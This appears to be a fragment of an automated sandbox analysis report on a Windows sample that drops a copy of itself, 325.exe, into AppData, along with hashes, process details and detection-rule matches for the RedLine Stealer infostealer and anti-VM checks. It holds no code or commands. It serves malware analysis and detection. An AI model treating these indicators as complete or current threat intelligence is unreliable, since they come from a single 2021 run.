                                                                                                                                                                            CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025

                                                                                                                                                                            Code Manipulations

                                                                                                                                                                            Statistics

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            Analysis Process: kS2dqbsDwD.exe PID: 5492 Parent PID: 5684

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:42:57
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\kS2dqbsDwD.exe'
                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                            File size:598944 bytes
                                                                                                                                                                            MD5 hash:888AB99280A081717EC5C5749266D1BD
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            Analysis Process: 325.exe PID: 4796 Parent PID: 5492

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:43:03
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\325.exe 325
                                                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                                                            File size:979968 bytes
                                                                                                                                                                            MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 33%, ReversingLabs
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            Analysis Process: 325.exe PID: 1784 Parent PID: 4796

                                                                                                                                                                            General

                                                                                                                                                                            Start time:11:43:44
                                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:{path}
                                                                                                                                                                            Imagebase:0x6b0000
                                                                                                                                                                            File size:979968 bytes
                                                                                                                                                                            MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                            Reset < >